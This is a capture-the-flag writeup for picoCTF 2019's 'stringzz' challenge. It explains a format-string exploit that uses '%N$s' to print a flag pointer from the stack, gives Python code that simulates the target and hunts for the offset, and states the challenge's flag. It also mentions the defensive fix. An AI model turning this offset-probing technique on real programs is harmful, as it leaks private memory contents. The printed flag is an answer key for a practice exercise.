# stringzz

## Problem

> Use a format string to pwn this program and get a flag. It's also found in /problems/stringzz\_2\_a90e0d8339487632cecbad2e459c71c4 on the shell server. Source.

* [Program](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/stringzz/vuln/README.md)
* [Source](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/stringzz/vuln.c)

## Solution

1. Even though the flag is read into a heap buffer, the pointer to that buffer (`buf`) is a local variable, so it sits on the stack in the frame that later calls `printf` on our input:

```c
char * buf = malloc(sizeof(char)*FLAG_BUFFER); /* buf lives on the stack, its target on the heap */
FILE *f = fopen("flag.txt","r");
fgets(buf,FLAG_BUFFER,f);                      /* the flag is copied into the heap buffer */
```

2. So if we send `%N$s` with the correct offset N, `printf` treats the N-th argument slot, which is where the saved `buf` pointer sits, as a `char *` and prints the flag. (I don't know why this is true. Taken from [here](https://tcode2k16.github.io/blog/posts/picoctf-2019-writeup/binary-exploitation/#stringzz).)
3. The commented-out section of [script.py](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/stringzz/script.py) finds the offset N.
4. Run [script.py](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/stringzz/script.py) on the shell server to get the flag.
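The mechanics behind steps 2 and 3, as an added example that is not the writeup's `script.py`: `%N$s` makes `printf` take its N-th variadic argument and print the string it points to. The program passes no arguments, so on x86-64 the first five slots are whatever is left in the argument registers and every slot after that is read straight off the stack, where the local `buf` pointer lives. The target below is simulated (`SimTarget`, with constructed stack words, an assumed heap address `HEAP_BUF` and the flag pointer assumed to sit in slot `FLAG_SLOT`); the offset hunt in `find_flag_offset` is the part that carries over to the real binary once `SimTarget` is replaced by something that sends a line to the process and returns its output. All names here are mine.

```python
import re

# Constructed sample values: the flag text matches the writeup, the
# addresses are invented but shaped like a typical x86-64 Linux process.
FLAG = b"picoCTF{str1nG_CH3353_166b95b4}\n"
HEAP_BUF = 0x5555_5555_92a0   # assumed address malloc() returned for buf
FLAG_SLOT = 11                # assumed position of buf among printf's argument slots


class SimTarget:
    """Toy 64-bit process standing in for the stringzz binary.

    `args` is what printf sees as its variadic arguments: on x86-64 SysV
    slots 1..5 come from rsi, rdx, rcx, r8, r9; slot 6 onward is read from
    the stack, which is where the real program's `buf` pointer sits.
    """

    def __init__(self, flag_slot=FLAG_SLOT):
        self.memory = {HEAP_BUF: FLAG}      # the only readable object we model
        junk = [0x1, 0x7ffd_1f2e_3d40, 0x0, 0x7f1a_2b3c_4d50, 0x5555_5555_a2a0,
                0x0, 0x4141_4141_4141_4141, 0x7ffd_1f2e_3fd0, 0x2, 0x0,
                0x7ffd_1f2e_3e00, 0x5555_5555_5a10, 0x0, 0x1ff]
        self.args = junk[:flag_slot - 1] + [HEAP_BUF] + junk[flag_slot - 1:]

    def run(self, fmt: bytes) -> bytes:
        """printf(fmt) with no real arguments; models %N$p and %N$s only.

        Raises RuntimeError for the SIGSEGV a real process takes when %s
        dereferences a word that is not a mapped address.
        """
        def expand(m):
            n, conv = int(m.group(1)), m.group(2)
            word = self.args[n - 1] if n <= len(self.args) else 0  # past our model: zeros
            if conv == b"p":
                return b"(nil)" if word == 0 else b"0x%x" % word
            if word not in self.memory:
                raise RuntimeError("SIGSEGV: %%%d$s dereferenced 0x%x" % (n, word))
            return self.memory[word].split(b"\0")[0]   # %s stops at the NUL
        return re.sub(rb"%(\d+)\$([ps])", expand, fmt)


def find_flag_offset(spawn, max_offset=40):
    """Return (N, flag) by probing %N$p, then %N$s, one fresh process per probe.

    The %p pass never dereferences anything, so it is free; %s is only
    tried on words that look like user-space pointers, which avoids most
    of the crashes a blind %N$s sweep would cause. `spawn()` must return
    an object with .run(fmt) -> bytes; for the real challenge that would
    wrap a fresh pwntools process() or remote().
    """
    for n in range(1, max_offset + 1):
        leak = spawn().run(b"%%%d$p" % n)
        # Canonical user-space pointers on x86-64 are 9..12 hex digits;
        # this skips nil, small integers and 8-byte ASCII garbage.
        if not re.fullmatch(rb"0x[0-9a-f]{9,12}", leak):
            continue
        try:
            out = spawn().run(b"%%%d$s" % n)
        except RuntimeError:
            continue        # mapped-looking but unreadable; real target would die here
        if b"picoCTF{" in out:
            return n, out.strip()
    return None


if __name__ == "__main__":
    print(find_flag_offset(SimTarget))
```

Each probe spawns a fresh target on purpose: on the real binary a `%N$s` aimed at a non-pointer word ends the process, so the scan has to survive that. The same bug is closed on the defender side by never passing user input as the format (`printf("%s", buf)`), and `-Wformat-security` flags the pattern at compile time.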

### Flag

`picoCTF{str1nG_CH3353_166b95b4}`
